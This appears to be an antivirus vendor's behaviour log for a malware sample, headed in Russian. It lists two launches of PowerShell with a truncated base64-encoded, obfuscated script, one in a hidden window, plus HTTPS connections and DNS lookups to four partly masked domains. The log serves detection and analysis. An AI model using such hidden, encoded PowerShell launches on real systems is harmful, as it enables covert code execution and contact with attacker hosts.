Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAG8AdQBqAHcAaQBvAGgAYwBvAGkAcwBiAG8AYQBzAGwAaQBlAHAAPQAnAGgAZQBhAGQAcQB1AG8AZQB6AHkAdQB1AHYAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAGUAYwB1AF...
- 'pa#####moversmohali.com':443
- 'el####ektrikci.com':443
- 'rv###deals.com':443
- 'sk###lish.com':443
- DNS ASK el####ektrikci.com
- DNS ASK rv###deals.com
- DNS ASK sk###lish.com
- DNS ASK pa#####moversmohali.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAG8AdQBqAHcAaQBvAGgAYwBvAGkAcwBiAG8AYQBzAGwAaQBlAHAAPQAnAGgAZQBhAGQAcQB1AG8AZQB6AHkAdQB1AHYAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAGUAYwB1AF...' (со скрытым окном)